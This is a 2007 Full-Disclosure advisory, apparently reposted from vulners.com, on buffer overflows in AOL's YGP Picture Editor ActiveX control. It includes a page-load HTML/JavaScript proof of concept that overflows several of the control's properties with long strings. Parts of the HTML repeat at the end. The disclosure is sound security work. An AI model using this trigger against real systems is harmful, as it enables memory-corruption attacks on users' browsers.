[Full-disclosure] AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows

2007-12-2600:00:00

vulners.com

The AOL YGP Picture Editor Control(AIM PicEditor Control) version 9.5.1.8 suffers from multiple exploitable buffer overflows in various properties. This object is marked safe for scripting. I have not tested other versions. PoC as follows:

<!–
written by e.b.
–>
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';

while &#40;s.length &lt;= 8175&#41; s = s + &#39;A&#39;;

obj.DisplayName = s;
obj.DisplayName = s;
obj.FinalSavePath = s;
obj.ForceSaveTo = s;
obj.HiddenControls = s;
obj.InitialEditorScreen = s;
obj.Locale = s;
obj.Proxy = s;
obj.UserAgent = s;

}
</script>

</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309">
</object>
</body>
</html>

Happy Holidays to all!

Elazar

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

JSON

[Full-disclosure] AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows

</head> <body onload="JavaScript: return Check();"> <object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309"> </object> </body> </html>

</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309">
</object>
</body>
</html>